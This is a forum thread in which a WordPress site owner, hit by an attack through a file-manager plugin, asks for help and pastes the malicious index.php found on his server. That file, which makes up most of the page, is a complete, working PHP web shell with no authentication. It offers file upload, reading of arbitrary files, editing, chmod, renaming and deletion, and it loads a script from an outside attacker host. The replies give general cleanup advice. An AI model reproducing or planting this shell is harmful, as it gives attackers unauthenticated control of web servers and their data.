A
A
Andrew2020-09-04 13:28:23
PHP
Andrew, 2020-09-04 13:28:23

I found myself going to cms wp, what do you think is the main one or should I dig further?

The attack began about a week ago, and it is tough on all sites, new users and new plugins appear, one of those that created a problem for almost a million wp file managers. After I cleaned and deleted the extra files, there is one change, the substitution of index.php, apparently through curl, found in the logs

spoiler

<?php

set_time_limit(0);

error_reporting(0);



if(get_magic_quotes_gpc()){

foreach($_POST as $key=>$value){

$_POST[$key] = stripslashes($value);

}

}

echo '<!DOCTYPE HTML>

<HTML>

<HEAD>



<link href="" rel="stylesheet" type="text/css">

<title>CHips L Pro sangad</title>

<style>

body{

font-family: "console", cursive;

background-color: #ffffff;

text-shadow:0px 0px 1px #ffffff;

}

#content tr:hover{

background-color: #000000;

text-shadow:0px 0px 10px #ffffff;

}

#content .first{

background-color: black;

}

#content .first:hover{

background-color: black;

text-shadow:0px 0px 1px #000000;

}

table{

border: 5px #000000 dotted;

}

H1{

font-family: "Rye", cursive;

}

a{

color: #000000;

text-decoration: none;

}

a:hover{

color: #fff;

text-shadow:0px 0px 10px #ffffff;

}

input,select,textarea{

border: 2px #000000 solid;

-moz-border-radius: 5px;

-webkit-border-radius:5px;

border-radius:5px;

}

</style>

</HEAD>

<BODY>

<SCRIPT SRC=http://rootkitninja.com/say.js>></SCRIPT>

<H1><center>CHips L MINI SHELL</center></H1>

<H1><center>CHips L pro</center></H1>

<body class="  pace-done" bgcolor="Black"><div class="pace  pace-inactive"><div class="pace-progress" data-progress-text="100%" data-progress="99" style="width: 100%;">

<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

<tr><td>Current Path : ';

if(isset($_GET['path'])){

$path = $_GET['path'];

}else{

$path = getcwd();

}

$path = str_replace('\\','/',$path);

$paths = explode('/',$path);



foreach($paths as $id=>$pat){

if($pat == '' && $id == 0){

$a = true;

echo '<a href="?path=/">/</a>';

continue;

}

if($pat == '') continue;

echo '<a href="?path=';

for($i=0;$i<=$id;$i++){

echo "$paths[$i]";

if($i != $id) echo "/";

}

echo '">'.$pat.'</a>/';

}

echo '</td></tr><tr><td>';

if(isset($_FILES['file'])){

if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){

echo '<font color="green">Upload File Berhasil Cok !</font><br />';

}else{

echo '<font color="red">Upload File Gagal Cok ! Mamposh Lo !</font><br />';

}

}

echo '<form enctype="multipart/form-data" method="POST">

Upload File : <input type="file" name="file" />

<input type="submit" value="upload cok !" />

</form>

</td></tr>';

if(isset($_GET['filesrc'])){

echo "<tr><td>Current File : ";

echo $_GET['filesrc'];

echo '</tr></td></table><br />';

echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');

}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){

echo '</table><br /><center>'.$_POST['path'].'<br /><br />';

if($_POST['opt'] == 'chmod'){

if(isset($_POST['perm'])){

if(chmod($_POST['path'],$_POST['perm'])){

echo '<font color="green">Mengubah Permission Berhasil</font><br />';

}else{

echo '<font color="red">Mengubah Pemission Gagal</font><br />';

}

}

echo '<form method="POST">

Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />

<input type="hidden" name="path" value="'.$_POST['path'].'">

<input type="hidden" name="opt" value="chmod">

<input type="submit" value="Go" />

</form>';

}elseif($_POST['opt'] == 'rename'){

if(isset($_POST['newname'])){

if(rename($_POST['path'],$path.'/'.$_POST['newname'])){

echo '<font color="green">Ganti Nama Berhasil</font><br />';

}else{

echo '<font color="red">Ganti Nama Gagal</font><br />';

}

$_POST['name'] = $_POST['newname'];

}

echo '<form method="POST">

New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />

<input type="hidden" name="path" value="'.$_POST['path'].'">

<input type="hidden" name="opt" value="rename">

<input type="submit" value="Go" />

</form>';

}elseif($_POST['opt'] == 'edit'){

if(isset($_POST['src'])){

$fp = fopen($_POST['path'],'w');

if(fwrite($fp,$_POST['src'])){

echo '<font color="green">Edit File Berhasil</font><br />';

}else{

echo '<font color="red">Edit File Gagal</font><br />';

}

fclose($fp);

}

echo '<form method="POST">

<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />

<input type="hidden" name="path" value="'.$_POST['path'].'">

<input type="hidden" name="opt" value="edit">

<input type="submit" value="Go" />

</form>';

}

echo '</center>';

}else{

echo '</table><br /><center>';

if(isset($_GET['option']) && $_POST['opt'] == 'delete'){

if($_POST['type'] == 'dir'){

if(rmdir($_POST['path'])){

echo '<font color="green">Menghapus Directory Berhasil</font><br />';

}else{

echo '<font color="red">Menghapus Directory Gagal</font><br />';

}

}elseif($_POST['type'] == 'file'){

if(unlink($_POST['path'])){

echo '<font color="green">Delete File Done.</font><br />';

}else{

echo '<font color="red">Delete File Error.</font><br />';

}

}

}

echo '</center>';

$scandir = scandir($path);

echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

<tr class="first">

<td><center>Name</center></td>

<td><center>Size</center></td>

<td><center>Permissions</center></td>

<td><center>Options</center></td>

</tr>';



foreach($scandir as $dir){

if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;

echo "<tr>

<td><a href=\"?path=$path/$dir\">$dir</a></td>

<td><center>--</center></td>

<td><center>";

if(is_writable("$path/$dir")) echo '<font color="Blue">';

elseif(!is_readable("$path/$dir")) echo '<font color="red">';

echo perms("$path/$dir");

if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';



echo "</center></td>

<td><center><form method=\"POST\" action=\"?option&path=$path\">

<select name=\"opt\">

<option value=\"\"></option>

<option value=\"delete\">Delete</option>

<option value=\"chmod\">Chmod</option>

<option value=\"rename\">Rename</option>

</select>

<input type=\"hidden\" name=\"type\" value=\"dir\">

<input type=\"hidden\" name=\"name\" value=\"$dir\">

<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">

<input type=\"submit\" value=\"Oke\" />

</form></center></td>

</tr>";

}

echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';

foreach($scandir as $file){

if(!is_file("$path/$file")) continue;

$size = filesize("$path/$file")/1024;

$size = round($size,3);

if($size >= 1024){

$size = round($size/1024,2).' MB';

}else{

$size = $size.' KB';

}



echo "<tr>

<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>

<td><center>".$size."</center></td>

<td><center>";

if(is_writable("$path/$file")) echo '<font color="Blue">';

elseif(!is_readable("$path/$file")) echo '<font color="red">';

echo perms("$path/$file");

if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';

echo "</center></td>

<td><center><form method=\"POST\" action=\"?option&path=$path\">

<select name=\"opt\">

<option value=\"\"></option>

<option value=\"delete\">Delete</option>

<option value=\"chmod\">Chmod</option>

<option value=\"rename\">Rename</option>

<option value=\"edit\">Edit</option>

</select>

<input type=\"hidden\" name=\"type\" value=\"file\">

<input type=\"hidden\" name=\"name\" value=\"$file\">

<input type=\"hidden\" name=\"path\" value=\"$path/$file\">

<input type=\"submit\" value=\"Oke\" />

</form></center></td>

</tr>";

}

echo '</table>

</div>';

}

echo '<center><br />Copyright 2K16 - 2K18 Indonesian Hacker Rulez</font><center>



<div align="center"><img style="width:100; height:100px ;" src="http://rootkitninja.com/images/devil.jpg?r=<?=rand(0,16000);?>"></div>





</BODY>

</HTML>';

function perms($file){

$perms = fileperms($file);



if (($perms & 0xC000) == 0xC000) {

// Socket

$info = 's';

} elseif (($perms & 0xA000) == 0xA000) {

// Symbolic Link

$info = 'l';

} elseif (($perms & 0x8000) == 0x8000) {

// Regular

$info = '-';

} elseif (($perms & 0x6000) == 0x6000) {

// Block special

$info = 'b';

} elseif (($perms & 0x4000) == 0x4000) {

// Directory

$info = 'd';

} elseif (($perms & 0x2000) == 0x2000) {

// Character special

$info = 'c';

} elseif (($perms & 0x1000) == 0x1000) {

// FIFO pipe

$info = 'p';

} else {

// Unknown

$info = 'u';

}



// Owner

$info .= (($perms & 0x0100) ? 'r' : '-');

$info .= (($perms & 0x0080) ? 'w' : '-');

$info .= (($perms & 0x0040) ?

(($perms & 0x0800) ? 's' : 'x' ) :

(($perms & 0x0800) ? 'S' : '-'));



// Group

$info .= (($perms & 0x0020) ? 'r' : '-');

$info .= (($perms & 0x0010) ? 'w' : '-');

$info .= (($perms & 0x0008) ?

(($perms & 0x0400) ? 's' : 'x' ) :

(($perms & 0x0400) ? 'S' : '-'));



// World

$info .= (($perms & 0x0004) ? 'r' : '-');

$info .= (($perms & 0x0002) ? 'w' : '-');

$info .= (($perms & 0x0001) ?

(($perms & 0x0200) ? 't' : 'x' ) :

(($perms & 0x0200) ? 'T' : '-'));



return $info;

}

?>

Answer the question

In order to leave comments, you need to log in

3 answer(s)
A
Anton R., 2020-09-04
@anton_reut

wp file manager
- the golden rule of any CMS - NEVER install any modules or plugins that allow you to manipulate any files other than images in the images folder! And some patients manage to install plugins that allow you to hack php code right in the articles...
What do you think this is the main one or to dig further?
- Of course, look for everything. Most likely there are already a lot of things settled there. Write to the hoster to scan all folders, backups, Aibolit and SSH to help you...

A
Andrew, 2020-09-07
@Majestty

I constantly see this request, tell me if it is a system request or an attack, at the same time every day
[07/Sep/2020:07:00:01 +0300] "GET / HTTP/1.1" 200 45 "-" "curl/7.29. 0"

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question